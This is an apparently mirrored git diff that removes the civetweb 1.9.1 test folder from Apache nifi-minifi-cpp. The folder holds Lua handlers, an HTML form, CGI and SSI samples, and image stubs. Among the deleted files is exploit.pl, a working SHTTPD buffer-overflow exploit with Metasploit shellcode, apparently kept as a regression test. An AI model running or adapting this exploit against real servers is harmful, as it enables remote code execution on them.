HTML 4.01 Frameset//EN" - "http://www.w3.org/TR/html4/frameset.dtd"> -<HTML> -<HEAD> -<TITLE>Error</TITLE> -</HEAD> -<BODY> -Custom error page -</BODY> -</HTML> \ No newline at end of file http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/exit.lua ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/exit.lua b/thirdparty/civetweb-1.9.1/test/exit.lua deleted file mode 100644 index 40356e3..0000000 --- a/thirdparty/civetweb-1.9.1/test/exit.lua +++ /dev/null @@ -1,15 +0,0 @@ - -msg=[[<html><body> -<p>Exit CivetWeb</p> -</body></html> -]] - -mg.write("HTTP/1.0 200 OK\r\n") -mg.write("Connection: close\r\n") -mg.write("Content-Length: " .. #msg .. "\r\n") -mg.write("Content-Type: text/html\r\n") -mg.write("\r\n") -mg.write(msg) - -os.exit(0) - http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/exploit.pl ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/exploit.pl b/thirdparty/civetweb-1.9.1/test/exploit.pl deleted file mode 100755 index 2067089..0000000 --- a/thirdparty/civetweb-1.9.1/test/exploit.pl +++ /dev/null @@ -1,69 +0,0 @@ -#!/usr/bin/perl -w - -# SHTTPD Buffer Overflow (POST) -# Tested on SHTTPD 1.34 WinXP SP1 Hebrew -# http://shttpd.sourceforge.net -# Codded By SkOd, 05/10/2006 -# ISRAEL -# -# details: -# EAX 00000194 , ECX 009EBCA8 , EDX 00BC488C -# EBX 00000004 , EIP 41414141 , EBP 41414141 -# ESI 00BC4358 , EDI 00BCC3CC ASCII "POST" -# ESP 009EFC08 ASCII 41,"AA...AAA" - - -use IO::Socket; - -sub fail(){ -syswrite STDOUT, "[-]Connect failed.\n"; -exit; -} - -sub header() -{ -print("##################################\n"); -print("SHTTPD (POST) Buffer Overflow.\n"); -print("[http://shttpd.sourceforge.net]\n"); -print("Codded By SkOd, 05/10/2006\n"); -print("##################################\n"); -} - -if (@ARGV < 1) -{ - &header(); - print("Usage: Perl shttpd.pl [host]\n"); - exit; -} - -&header(); -$host=$ARGV[0]; -$port="80"; -$host=~ s/(http:\/\/)//eg; - -#win32_exec- CMD=calc Size=160 (metasploit.com) -$shell = -"%33%c9%83%e9%de%d9%ee%d9%74%24%f4%5b%81%73%13%52". -"%ca%2b%e0%83%eb%fc%e2%f4%ae%22%6f%e0%52%ca%a0%a5". -"%6e%41%57%e5%2a%cb%c4%6b%1d%d2%a0%bf%72%cb%c0%a9". -"%d9%fe%a0%e1%bc%fb%eb%79%fe%4e%eb%94%55%0b%e1%ed". -"%53%08%c0%14%69%9e%0f%e4%27%2f%a0%bf%76%cb%c0%86". -"%d9%c6%60%6b%0d%d6%2a%0b%d9%d6%a0%e1%b9%43%77%c4". -"%56%09%1a%20%36%41%6b%d0%d7%0a%53%ec%d9%8a%27%6b". -"%22%d6%86%6b%3a%c2%c0%e9%d9%4a%9b%e0%52%ca%a0%88". -"%0d%a2%b3%1e%d8%c4%7c%1f%b5%a9%4a%8c%31%ca%2b%e0"; - - -$esp="%73%C3%2A%4F"; #[4F2AC373]JMP ESP (kernel32.dll) WinXP SP1(Hebrew) -$buff=("%41"x8).$esp.("%90"x85).$shell; #Shellcode+NOP=245 - -print length($buff) . "\n"; - -$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || &fail(); - syswrite STDOUT,"[+]Connected.\n"; - print $sock "POST /$buff HTTP/1.1\n"; - print $sock "HOST:$host\n\n"; - syswrite STDOUT,"[+]Done.\n"; -close($sock); - -# milw0rm.com [2006-10-05] http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/filehandler.lua ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/filehandler.lua b/thirdparty/civetweb-1.9.1/test/filehandler.lua deleted file mode 100644 index 57bf411..0000000 --- a/thirdparty/civetweb-1.9.1/test/filehandler.lua +++ /dev/null @@ -1,93 +0,0 @@ -function send_ok() - mg.write("HTTP/1.0 200 OK\r\n") - mg.write("Connection: close\r\n") - mg.write("Date: " .. os.date("%a, %d %b %Y %H:%M:%S GMT") .. "\r\n") -end - - -function send_not_found() - mg.write("HTTP/1.0 404 Not Found\r\n") - mg.write("Connection: close\r\n") - mg.write("Date: " .. os.date("%a, %d %b %Y %H:%M:%S GMT") .. "\r\n") -end - - -handler = "filehandler.lua" -sub_uri = mg.request_info.uri:sub(#handler+2) -filename = "D:\\civetweb\\civetweb" .. sub_uri -attr = lfs.attributes(filename) - ---[[ -if not attr then - send_not_found() - mg.write("\r\n") - mg.write("File " .. sub_uri .. " not available") - return -end -]] - -if mg.request_info.request_method == "GET" then - -- send_file will handle 404 internally - mg.send_file(filename) - return - -elseif mg.request_info.request_method == "HEAD" then - -- send_file can handle "GET" and "HEAD" - mg.send_file(filename) - return - -elseif mg.request_info.request_method == "PUT" then - local f = io.open(filename, "w") - if (not f) then - mg.write("HTTP/1.0 500 Internal Server Error\r\n") - mg.write("Connection: close\r\n") - mg.write("Date: " .. os.date("%a, %d %b %Y %H:%M:%S GMT") .. "\r\n") - mg.write("\r\n") - return - end - - mg.write("HTTP/1.0 201 Created\r\n") - mg.write("Connection: close\r\n") - mg.write("Date: " .. os.date("%a, %d %b %Y %H:%M:%S GMT") .. "\r\n") - mg.write("\r\n") - repeat - local buf = mg.read(); - if (buf) then - f:write(buf) - end - until (not buf); - f:close() - - mg.write("HTTP/1.0 201 Created\r\n") - mg.write("Connection: close\r\n") - mg.write("Date: " .. os.date("%a, %d %b %Y %H:%M:%S GMT") .. "\r\n") - mg.write("\r\n") - return - -elseif mg.request_info.request_method == "DELETE" then - if not attr then - send_not_found() - mg.write("\r\n") - mg.write("File " .. sub_uri .. " not available") - return - end - os.remove(filename) - mg.write("HTTP/1.0 204 No Content\r\n") - mg.write("Connection: close\r\n") - mg.write("Date: " .. os.date("%a, %d %b %Y %H:%M:%S GMT") .. "\r\n") - mg.write("\r\n") - return - -elseif mg.request_info.request_method == "OPTIONS" then - send_ok() - mg.write("Allow: GET, HEAD, PUT, DELETE, OPTIONS\r\n") - mg.write("\r\n") - return - -else - mg.write("HTTP/1.0 405 Method Not Allowed\r\n") - mg.write("Connection: close\r\n") - mg.write("Date: " .. os.date("%a, %d %b %Y %H:%M:%S GMT") .. "\r\n") - mg.write("\r\n") - return -end http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/form.html ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/form.html b/thirdparty/civetweb-1.9.1/test/form.html deleted file mode 100644 index 381084c..0000000 --- a/thirdparty/civetweb-1.9.1/test/form.html +++ /dev/null @@ -1,118 +0,0 @@ -<!DOCTYPE HTML> -<html> - -<head> - <meta charset="UTF-8"> - <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> - <title>Example page for HTML form handling</title> -</head> - -<body> - - <!-- HTML forms can use GET or POST, and the encoding can be application/x-www-form-urlencoded or multipart/form-data. - If no method is specified (like <form method="method">), GET should be the default method. - If no encoding is specified, application/x-www-form-urlencoded should be the default. - Submit buttons may overwrite action, method and enctype by using formaction, formmethod and formenctype. - - References: - http://www.w3.org/TR/html401/interact/forms.html - http://www.w3schools.com/html/html_forms.asp, - http://www.w3schools.com/html/html_form_attributes.asp - http://www.w3.org/TR/html401/interact/forms.html#adef-enctype - --> - - - <form action="/handle_form.embedded_c.example.callback"> - See <a href="http://www.w3schools.com/html/html_form_input_types.asp">HTML form tutorial</a> - and <a href="http://www.w3.org/TR/html401/interact/forms.html">HTML spec</a>.<br /> - - <fieldset> - <legend>Text inputs:</legend> - A text: <input type="text" name="textin"><br /> - A password: <input type="password" name="passwordin"><br /> - </fieldset> - - <fieldset> - <legend>Radio set 1:</legend> - <input type="radio" name="radio1" value="val1" checked>val1<br /> - <input type="radio" name="radio1" value="val2">val2<br /> - <input type="radio" name="radio1" value="val3">val3<br /> - </fieldset> - - <fieldset> - <legend>Radio set 2:</legend> - <input type="radio" name="radio2" value="val1" checked>val1<br /> - <input type="radio" name="radio2" value="val2">val2<br /> - <input type="radio" name="radio2" value="val3">val3<br /> - </fieldset> - - <fieldset> - <legend>Checkboxes:</legend> - <input type="checkbox" name="check1" value="val1" checked>val1<br /> - <input type="checkbox" name="check2" value="val2">val2<br /> - <input type="checkbox" name="check3" value="val3">val3<br /> - </fieldset> - - <fieldset> - <legend>HTML5 inputs:</legend> - A number: <input type="number" name="numberin" min="1" max="5"><br /> - A date: <input type="date" name="datein"><br /> - A color: <input type="color" name="colorin"><br /> - A range: <input type="range" name="rangein" min="1" max="5"><br /> - A month: <input type="month" name="monthin"><br /> - A week: <input type="week" name="weekin"><br /> - A time: <input type="time" name="timein"><br /> - A datetime: <input type="datetime" name="datetimen"><br /> - A datetime-local: <input type="datetime-local" name="datetimelocalin"><br /> - An email: <input type="email" name="emailin"><br /> - A search: <input type="search" name="searchin"><br /> - A tel: <input type="tel" name="telin"><br /> - An url: <input type="url" name="urlin"><br /> - </fieldset> - - <fieldset> - <legend>Files:</legend> - A file: <input type="file" name="filein"><br /> - Multiple files: <input type="file" name="filesin" multiple><br> - </fieldset> - - <fieldset> - <legend>Dropdown:</legend> - <select name="selectin"> - <option value="opt1">opt1</option> - <option value="opt2">opt2</option> - <option value="opt3">opt3</option> - </select> - </fieldset> - - <fieldset> - <legend>Text area:</legend> - <textarea name="message" rows="10" cols="30">Text area default text.</textarea> - </fieldset> - - <fieldset> - <legend>Submit:</legend> - <fieldset> - <legend>Submit to Lua script:</legend> - This will only work if server side Lua scripting is activated and /handle_form.lua can be found on the server. - <br> - <input type="submit" value="Submit" formmethod="POST" formenctype="multipart/form-data" - formaction="/handle_form.lua"> - </fieldset> - - <fieldset> - <legend>Submit to callback:</legend> - This will work in the embedded_c example. It will call mg_handle_form_data to parse the request. - <br> - <input type="submit" value="Submit (form default)"> - <input type="submit" value="Submit (GET)" formmethod="GET"> - <input type="submit" value="Submit (POST)" formmethod="POST"> - <input type="submit" value="Submit (POST, url-encoded)" formmethod="POST" formenctype="application/x-www-form-urlencoded"> - <input type="submit" value="Submit (POST, form-data)" formmethod="POST" formenctype="multipart/form-data"> - </fieldset> - </fieldset> - - </form> -</body> - -</html> http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/handle_form.lua ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/handle_form.lua b/thirdparty/civetweb-1.9.1/test/handle_form.lua deleted file mode 100644 index c3694ae..0000000 --- a/thirdparty/civetweb-1.9.1/test/handle_form.lua +++ /dev/null @@ -1,123 +0,0 @@ --- Some basic checks -if mg.request_info.request_method ~= "POST" or mg.request_info.content_type:lower():sub(1,19) ~= 'multipart/form-data' then - mg.write("HTTP/1.0 400 OK\r\n") - mg.write("Connection: close\r\n") - mg.write("Content-Type: text/plain; charset=utf-8\r\n") - mg.write("Cache-Control: max-age=0, must-revalidate\r\n") - mg.write("\r\n") - mg.write("Bad request\r\n\r\n") - return -end - --- HTTP headers -mg.write("HTTP/1.0 200 OK\r\n") -mg.write("Connection: close\r\n") -mg.write("Content-Type: text/plain; charset=utf-8\r\n") -mg.write("Cache-Control: max-age=0, must-revalidate\r\n") -mg.write("\r\n") - --- Which form sent the data? -mg.write("Read POST data from " .. mg.request_info.http_headers.Referer .. ":\r\n\r\n") - --- Count some data fields -local fields = 0 -local datasize = 0 - --- Read the entire body data (POST content) into "bdata" variable. --- Use a string builder pattern for performance reasons -stringtab = {} -bdata = "" -repeat - local add_data = mg.read() - if add_data then - stringtab[#stringtab+1] = add_data - end -until (add_data == nil); -bdata = table.concat(stringtab) -stringtab = nil - --- Get the boundary string. -bs = "--" .. ((mg.request_info.content_type):upper():match("BOUNDARY=(.*)")); - --- The POST data has to start with the boundary string. --- Check this and remove the starting boundary. -if bdata:sub(1, #bs) ~= bs then - error "invalid format of POST data" -end -bdata = bdata:sub(#bs) - --- The boundary now starts with CR LF. -bs = "\r\n" .. bs - --- Now loop through all the parts -while #bdata>4 do - -- Find the header of new part. - part_header_end = bdata:find("\r\n\r\n", 1, true) - - -- Parse the header. - local form_field_name, file_name - h = bdata:sub(1, part_header_end+2) - for key,val in h:gmatch("([^%:\r\n]*)%s*%:%s*([^\r\n]*)\r\n") do - if key:upper() == "CONTENT-DISPOSITION" then - form_field_name = val:match('name=%"([^%"]*)%"') - file_name = val:match('filename=%"([^%"]*)%"') - end - end - - -- Remove the header from "bdata". - bdata = bdata:sub(part_header_end+4) - - -- Find the end of the body by locating the boundary string. - local part_body_end = bdata:find(bs, 1, true) - - -- Isolate the content, and drop it from "bdata". - local form_field_value = bdata:sub(1,part_body_end-1) - bdata = bdata:sub(part_body_end+#bs) - - -- Now the data (file content or field value) is isolated: We know form_field_name and form_field_value. - -- Here the script should do something useful with the data. This example just sends it back to the client. - if form_field_name then - mg.write("Field name: " .. form_field_name .. "\r\n") - end - - local len = #form_field_value - mg.write("Field data length: " .. len .. "\r\n") - - if file_name then - mg.write("File name: " .. file_name .. "\r\n") - mg.write("File content:\r\n") - local maxlen - if len>320 then maxlen=320 else maxlen=len end - - for l=0,maxlen,16 do - for m=1,16 do - local b = form_field_value:byte(l+m) - if (b) then - mg.write(string.format("%02x ", b)) - else - mg.write(" ") - end - end - mg.write(" - " .. form_field_value:sub(l+1,l+16):gsub("[%c%z%s]", " ") .. "\r\n") - end - if maxlen<len then - mg.write(string.format("... (+ %u bytes)\r\n", len-maxlen)) - end - - else - -- not a file - if len<50 then - mg.write("Field value: " .. form_field_value .. "\r\n") - else - mg.write("Field value: " .. form_field_value:sub(1, 40) .. " .. (" .. len .. " bytes)\r\n") - end - end - - - mg.write("\r\n") - fields = fields + 1 - datasize = datasize + len - -end - -mg.write("Got " .. fields .. " input fields with " .. datasize .. " bytes total\r\n"); http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/hello.cgi ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/hello.cgi b/thirdparty/civetweb-1.9.1/test/hello.cgi deleted file mode 100755 index 6a288d2..0000000 --- a/thirdparty/civetweb-1.9.1/test/hello.cgi +++ /dev/null @@ -1,6 +0,0 @@ -#!/bin/sh - -echo "Content-Type: text/plain" -echo - -echo $QUERY_STRING http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/hello.shtml ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/hello.shtml b/thirdparty/civetweb-1.9.1/test/hello.shtml deleted file mode 100644 index d4094cc..0000000 --- a/thirdparty/civetweb-1.9.1/test/hello.shtml +++ /dev/null @@ -1,5 +0,0 @@ -<pre> -hello.shtml: include "hello.txt": -<!--#include file="hello.txt" --> -hello.shtml: end -</pre> http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/hello.txt ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/hello.txt b/thirdparty/civetweb-1.9.1/test/hello.txt deleted file mode 100644 index 7feddbf..0000000 --- a/thirdparty/civetweb-1.9.1/test/hello.txt +++ /dev/null @@ -1 +0,0 @@ -simple text file http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/hello_gz.txt.gz ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/hello_gz.txt.gz b/thirdparty/civetweb-1.9.1/test/hello_gz.txt.gz deleted file mode 100644 index 7325429..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/hello_gz.txt.gz and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/hello_gz_unzipped.txt ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/hello_gz_unzipped.txt b/thirdparty/civetweb-1.9.1/test/hello_gz_unzipped.txt deleted file mode 100644 index bde6e8a..0000000 --- a/thirdparty/civetweb-1.9.1/test/hello_gz_unzipped.txt +++ /dev/null @@ -1 +0,0 @@ -hello from a zipped text file http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/html_esc.lua ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/html_esc.lua b/thirdparty/civetweb-1.9.1/test/html_esc.lua deleted file mode 100644 index addfe76..0000000 --- a/thirdparty/civetweb-1.9.1/test/html_esc.lua +++ /dev/null @@ -1,60 +0,0 @@ -htmlEscape = { "☺", "☻", "♥", "♦", "♣", "♠", "•", -- ASCII 1-7 (symbols for control characters, see code page 437) - "◘", "○", "◙", "♂", "♀", "♪", "♫", "☼", -- ASCII 8-15 - "►", "◄", "↕", "‼", "¶", "§", "▬", "↨", -- ASCII 16-23 - "↑", "↓", "↨", "←", "∟", "→", "▲", "▼", -- ASCII 24-31 - " ", "!", """, "#", "$", "%", "&", "'", -- ASCII 32-39 - "(", ")", "*", "+", ",", "-", ".", "/", -- ASCII 40-47 - "0", "1", "2", "3", "4", "5", "6", "7", -- ASCII 48-55 - "8", "9", ":", ";", "<", "=", ">", "?", -- ASCII 56-63 - "@", "A", "B", "C", "D", "E", "F", "G", -- ASCII 64-71 - "H", "I", "J", "K", "L", "M", "N", "O", -- ASCII 72-79 - "P", "Q", "R", "S", "T", "U", "V", "W", -- ASCII 80-87 - "X", "Y", "Z", "[", "\\", "]", "^", "_", -- ASCII 88-95 - "`", "a", "b", "c", "d", "e", "f", "g", -- ASCII 96-103 - "h", "i", "j", "k", "l", "m", "n", "o", -- ASCII 104-111 - "p", "q", "r", "s", "t", "u", "v", "w", -- ASCII 112-119 - "x", "y", "z", "{", "|", "}", "~", "⌂", -- ASCII 120-127 - "Ç", "ü", "é", "â", "ä", "à", "å", "ç", -- 128-135 (dos code page 850) - "ê", "ë", "è", "ï", "î", "ì", "Ä", "Å", -- 136-143 - "É", "æ", "Æ", "ô", "ö", "ò", "û", "ù", -- 144-151 - "ÿ", "Ö", "Ü", "ø", "£", "Ø", "×", "ƒ", -- 152-159 - "á", "í", "ó", "ú", "ñ", "Ñ", "ª", "º", -- 160-167 - "¿", "®", "¬", "½", "¼", "¡", "«", "»", -- 168-175 - "░", "▒", "▓", "│", "┤", "Á", "Â", "À", -- 176-183 - "©", "╣", "║", "╗", "╝", "¢", "¥", "┐", -- 184-191 - "└", "┴", "┬", "├", "─", "┼", "ã", "Ã", -- 192-199 - "╚", "╔", "╩", "╦", "╠", "═", "╬", "¤", -- 200-207 - "ð", "Ð", "Ê", "Ë", "È", "ı", "Í", "Î", -- 208-215 - "Ï", "┘", "┌", "█", "▄", "¦", "Ì", "▀", -- 216-223 - "Ó", "ß", "Ô", "Ò", "õ", "Õ", "µ", "þ", -- 224-231 - "Þ", "Ú", "Û", "Ù", "ý", "Ý", "¯", "´", -- 232-239 - "≡", "±", "‗", "¾", "¶", "§", "÷", "¸", -- 240-247 - "°", "¨", "·", "¹", "³", "²", "■", "□", -- 248-255 (use empty box for 255) -}; -htmlEscape[0] = "·" -- in this table, we use a 8 bit character set, where every has a different graphical representation - --- the conversion table should work as a convertion function for strings as well -setmetatable(htmlEscape, {__call = function (tab,str) return string.gsub(str, ".", function (c) return tab[c:byte()] end) end}) - - -function htmlEsc(txt) - s = txt:gsub("%&", "&") - s = s:gsub("%<", "<") - return s:gsub("%>", ">") -end - - -function iso8859_1_to_utf8(txt) - local s = txt:gsub(".", - function (c) - local b = c:byte() - if b < 128 then - return c - elseif b < 192 then - return string.char(194, b) - else - return string.char(195, b-64) - end - end) - return s -end http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/00.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/00.png b/thirdparty/civetweb-1.9.1/test/imagetest/00.png deleted file mode 100644 index 36160d9..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/00.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/01.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/01.png b/thirdparty/civetweb-1.9.1/test/imagetest/01.png deleted file mode 100644 index 725bf68..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/01.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/02.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/02.png b/thirdparty/civetweb-1.9.1/test/imagetest/02.png deleted file mode 100644 index 5b5edf3..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/02.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/03.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/03.png b/thirdparty/civetweb-1.9.1/test/imagetest/03.png deleted file mode 100644 index 8b7d772..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/03.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/04.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/04.png b/thirdparty/civetweb-1.9.1/test/imagetest/04.png deleted file mode 100644 index dc64871..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/04.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/05.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/05.png b/thirdparty/civetweb-1.9.1/test/imagetest/05.png deleted file mode 100644 index 5cea521..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/05.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/06.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/06.png b/thirdparty/civetweb-1.9.1/test/imagetest/06.png deleted file mode 100644 index cb10122..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/06.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/07.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/07.png b/thirdparty/civetweb-1.9.1/test/imagetest/07.png deleted file mode 100644 index 70134c5..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/07.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/08.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/08.png b/thirdparty/civetweb-1.9.1/test/imagetest/08.png deleted file mode 100644 index ee7c3d8..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/08.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/09.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/09.png b/thirdparty/civetweb-1.9.1/test/imagetest/09.png deleted file mode 100644 index 6373472..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/09.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/10.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/10.png b/thirdparty/civetweb-1.9.1/test/imagetest/10.png deleted file mode 100644 index 3823e3a..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/10.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/11.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/11.png b/thirdparty/civetweb-1.9.1/test/imagetest/11.png deleted file mode 100644 index fa3f411..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/11.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/12.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/12.png b/thirdparty/civetweb-1.9.1/test/imagetest/12.png deleted file mode 100644 index eec6ee1..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/12.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/13.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/13.png b/thirdparty/civetweb-1.9.1/test/imagetest/13.png deleted file mode 100644 index 2dcebc5..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/13.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/14.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/14.png b/thirdparty/civetweb-1.9.1/test/imagetest/14.png deleted file mode 100644 index 2a08667..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/14.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/15.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/15.png b/thirdparty/civetweb-1.9.1/test/imagetest/15.png deleted file mode 100644 index 6d57b59..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/15.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/16.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/16.png b/thirdparty/civetweb-1.9.1/test/imagetest/16.png deleted file mode 100644 index e4611a3..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/16.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/17.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/17.png b/thirdparty/civetweb-1.9.1/test/imagetest/17.png deleted file mode 100644 index 1975b73..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/17.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/18.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/18.png b/thirdparty/civetweb-1.9.1/test/imagetest/18.png deleted file mode 100644 index 7090c12..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/18.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/19.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/19.png b/thirdparty/civetweb-1.9.1/test/imagetest/19.png deleted file mode 100644 index 236f3c3..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/19.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/20.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/20.png b/thirdparty/civetweb-1.9.1/test/imagetest/20.png deleted file mode 100644 index 1c7e5a3..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/20.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/21.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/21.png b/thirdparty/civetweb-1.9.1/test/imagetest/21.png deleted file mode 100644 index e8d9344..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/21.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/22.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/22.png b/thirdparty/civetweb-1.9.1/test/imagetest/22.png deleted file mode 100644 index fd8d4aa..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/22.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/23.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/23.png b/thirdparty/civetweb-1.9.1/test/imagetest/23.png deleted file mode 100644 